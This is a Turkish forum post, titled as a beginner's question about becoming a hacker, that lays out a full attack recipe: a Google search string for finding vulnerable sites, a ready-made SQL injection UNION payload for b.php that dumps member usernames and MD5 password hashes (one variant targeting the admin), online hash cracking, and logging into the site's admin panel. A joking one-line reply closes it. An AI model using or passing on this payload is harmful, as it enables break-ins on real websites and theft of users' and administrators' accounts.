

Bende Hacker Olmak İstiyorm..Öğrenmem Gereken Neler Var?.
-
Hadi içinizdeki hackeri dışarı çıkaralım :D
arama kodum : allintext:"Home Member Search Chat Room Forum Help/Support privacy policy"
googlede artıyoruz
çıkan sitelerin sonuna : /b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
http://www.site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/* olarak ekliyoruzyani : http://www.site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
http://www.site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*sonuç olarak :
test:e9700cd16358be83bbc5df9b32629b1cdiye sonuç çıkarkullanıcı adı :testşifresi :e9700cd16358be83bbc5df9b32629b1ctabiki e9700cd16358be83bbc5df9b32629b1c şifrenin md5 li halidir bunu md5 çözücülerde kırdığımızda "sepone" şifre elimize geçeryanikullanıcı adı :testşifre : seponeimdi öğrendimizi bu bilgileri napacaz ???/newadmin/login.php ekliyoruz sitemize ve girişi yapıyoruz yaniwww.site.com/newadmin/login.php olacak ...Bu arada sitede admin online ise onun şifreyi alırsınız yoksa online olan bir kullanıcının şifreyi alırsınız kullanıcı hesabınada login.php den ulaşabilirsiniz :)kolay gelsin...edit: bu arada md5 i http://gdataonline.com/seekhash.php burdan kırdıra bilirsiniz ... :) -
tavlada eline verilen adam ha:D kriz amk:D koptum:D